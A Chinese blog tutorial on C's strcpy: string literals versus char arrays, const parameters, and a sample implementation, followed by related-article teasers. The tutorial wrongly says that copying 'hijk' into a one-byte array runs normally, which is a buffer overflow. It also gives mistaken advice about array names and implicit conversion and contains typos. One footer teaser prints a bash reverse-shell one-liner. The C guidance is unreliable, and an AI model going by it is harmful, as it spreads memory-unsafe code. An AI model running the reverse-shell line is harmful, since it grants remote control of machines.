在C语言中,字符串一直都是热点,关于strcpy函数大家都很熟悉,但是真正了解的很少,一旦用到总会报一大堆莫名其妙错误,今天我就来给大家详细剖析一下strcpy函数。

虽然不能看到strcpy的内部实现,但是我们通过查阅<string.h>可以看到strcpy函数的声明。

char *  __cdecl strcpy(char *, const char *);

那个_cdecl是一个函数调用约定,暂且不讨论,我们今天就来说一下strcpy指针形参加const与不加的区别,帮助大家更好使用这个函数

首先我们要理解这两种语句有何不同

 char *p="abcd";
char str[]="abcd";

这两条语句都是存储abcd字符串,但是经过编译链接后,会产生不同的结果
语句1,常量字符串会保存在程序的常量区,编译时会将该字符串在常量区的起始地址拷贝过来存在指针p中,

语句2  常量字符串也会保存在程序的常量区,但是在字符数组str初始化时i,会将字符串拷贝到str中,即数组中存储字符串副本

即str[0]='a';str[1]='b';str[2]='c';str[3]='d';str[4]='\0';

如图所示

我们看到在地址0x0042201C 处存储的是字符串常量abcd,而语句1汇编指令mov  dword ptr ds:[ebp-4], 0xoo42201C,作用就是把常量字符串地址存到[ebp-4]这个内存空间(即变量名为p的内存地址)

语句2则是将该常量值一个个拷贝到数组中,即字符串存储在数据段中

那么这样区分之后,会产生一个是否允许修改的差异,我们都知道常量区中的内容不允许修改,而数据区的内容是可读可写的,因此,如果我们这样写

 p[]='w';
str[]='q';

会发现 虽然语句1编译链接都通过,但是运行时会报错,这是因为语句1试图非法修改常量区的值,而常量区是允许修改,只能读取

而语句2则可以使程序正常运行,因为str数组只是常量字符串的一份副本,这份副本存在数据区,可以修改,而且不会影响到常量区字符串的值

明白了关于指向字符串常量的指针和存储字符串常量的数组之间的差异后,我们接下来讨论指针形参输出型和输入型问题

对于形参是指针类型的,我们都知道是传址调用,也明白函数内形参的改变会影响到形参,这就涉及一个实参是否允许修改的问题

char * strcpy(char * strDest,const char * strSrc);

这个函数形参,一个是不加const修饰,一个是加上了const修饰,有何区别呢?这个函数是将strSrc指向的字符串复制到strDest中,(连同字符串结束符'\0'一起复制),

那么就是说,strDest指向的值是可以修改的,而strSRC指向的值在函数中是不允许修改的,我们把加上const修饰的参数称为输入型参数,即只允许读取,不允许写入,把不加const修饰的参数称为输出型参数,即可以在函数内部进行读写改变,从而在主调函数中看到改变。

通过刚才的探讨,我们可以很容易知道如下四条语句哪些会使程序运行时出错

char *p="";
char *q="abcd";
char str1[]="";
char str2[]="hijk";
strcpy(p,q);①
strcpy(p,str1);②
strcpy(str1,p);③
strcpy(str1,str2);④

很明显,标号①②的语句都会运行时出错,因为strcpy的第一个形参要求是可以写入的,而p,q都是指向了常量区字符串的首地址,不可写入

标号③④都是可以正常运行,但是推荐写法③,因为写法④设计一个隐式转换问题,将str2转换成了常指针了。

下面给出一个strcpy函数的实现

char * strcpy(char *strDest,const char *strSrc)
{
assert((strDest!=NULL)&&(strSrc!=NULL)); //断言两个指针都不是空指针
char *address=strDest; //函数要返回复制后的字符串首地址
while((*(strDest++)=*(strSrc++))!='\0');//连同结束符一起复制
return address; //返回复制后的字符串首地址
}

总结

1 char *p="1234";指针p指向常量区,不允许修改内容及p[0]='a'非法

2 char str[5]="abcd"  字符数组str复制了常量区字符串“abcd”的值,而字符数组是在数据段,可以进行修改及str[0]='1'合法

3 对于strcpy函数的第一个形参,是输出型形参,因此只能是数组名,而不能是字符指针变量

4 对strcpy的第二个形参,是输入型形参,可以是数组名或者是字符指针变量,但最好是字符指针变量

关于strcpy函数形参类型的解析和指针作为输入型输出型参数的不同的更多相关文章

  1. 通过指定函数/方法形参类型提高PHP代码可靠性

    指定形参类型是PHP 5就支持的一项特性.形参支持array - 数组. object - 对象两种类型. class User{ public $name; public $password; fu ...

  2. C/C++——strcpy函数的实现

    题目:     已知strcpy函数的原型是:         char * strcpy(char * strDest,const char * strSrc);     1.不调用库函数,实现st ...

  3. 《征服 C 指针》摘录5:函数形参 和 空的下标运算符[]

    一.函数的形参的声明 C 语言可以像下面这样声明函数的形参: void func(int a[]) {     // ... } 对于这种写法,无论怎么看都好像要向函数的参数传递数组. 可是,在 C ...

  4. python学习道路(day4note)(函数,形参实参位置参数匿名参数,匿名函数,高阶函数,镶嵌函数)

    1.函数 2种编程方法 关键词面向对象:华山派 --->> 类----->class面向过程:少林派 -->> 过程--->def 函数式编程:逍遥派 --> ...

  5. memcpy、memmove、memset及strcpy函数实现和理解

    memcpy.memmove.memset及strcpy函数实现和理解 关于memcpy memcpy是C和C++ 中的内存拷贝函数,在C中所需的头文件是#include<string.h> ...

  6. strcpy函数的C/C++实现

    2013-07-05 14:07:49 本函数给出了几种strcpy与strncpy的实现,有ugly implementation,也有good implementation.并参考标准库中的imp ...

  7. strcmp函数和strcpy函数

    (一)strcmp函数 strcmp函数是比較两个字符串的大小,返回比較的结果.一般形式是: i=strcmp(字符串,字符串); 当中,字符串1.字符串2均可为字符串常量或变量:i   是用于存放比 ...

  8. C#中:函数访问级别对函数形参访问级别的约束

    Inconsistent accessibility: parameter type 'Program.CommandLineInfo' is less accessible than method ...

  9. strcpy函数用法

    字符串是数组类型,不能通过赋值运算进行,要通过strcpy进行拷贝,其中目的字符串必须是字符串变量,源字符串可以是常量,复制后源字符串保持不变. strcpy()是C中的一个复制字符串的库函数,在C+ ...

随机推荐

  1. 一段c++代码实现睡眠功能

    #ifdef ACL_UNIX struct timeval tv; tv.tv_sec = delay / 1000; tv.tv_usec = (suseconds_t) (delay - tv. ...

  2. Python 中关于 round 函数的坑

    round函数很简单(而且不需要引入math模块),对浮点数进行近似取值,保留几位小数. 比如 # -*- coding: UTF-8 -*- r1=round(12.12345,3) r2=roun ...

  3. asp.net core Serilog的使用

    先贴上关于使用这个日志组件的一些使用方法,等有时间了在吧官方的文档翻译一下吧,现在真是没时间. Serilog在使用上主要分为两大块: 第一块是主库,包括Serilog以及Serilog.AspNet ...

  4. zabbix异常信息修改已确认,为未确认

    问题知悉只能知悉一次知悉了之后就不能再次知悉了,但又不想再创建新的异常怎么办呢.....直接改数据库数据.首先找到acknowledges表这里边存放的全是已经知悉的异常然后找events表,even ...

  5. shell反射

    一.介绍 bash反射就是反弹一个交互的shell,类似ssh连接,可以执行命令 二.使用命令 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ...

  6. Python——Django-urls.py的作用

    一.urls.py的作用是保存路径和函数的对应关系 二.函数返回指定内容 from django.urls import path #引用HTTP协议的代码 from django.shortcuts ...

  7. HBase · 印象

    2018-12-20 关键词: HBase是什么 . 什么是HBase . HBase基本概念 本篇文章系本人根据目前所掌握的知识对 HBase 的基本概念作出的一篇轻简式科普文章.关于文章所述的知识 ...

  8. springcloud 新增微服务

    个人记录 记录公司微服务项目,模块添加的步骤 一  创建Module 选择maven groupid和artifactid 参考 pom文件 <project xmlns="http: ...

  9. GoLang-Rpc编程

    Rpc定义: RPC(Remote Procedure Call,远程过程调用)是一种通过网络从远程计算机程序上请求服务,而不需要了解底层网络细节的应用程序通信协议. RPC协议构建于TCP或UDP, ...

  10. JavaProperties类、序列化流与反序列化流、打印流、commons-IO整理

    Properties类 Properties 类表示了一个持久的属性集.Properties 可保存在流中或从流中加载.属性列表中每个键及其对应值都是一个字符串. 特点: 1.Hashtable的子类 ...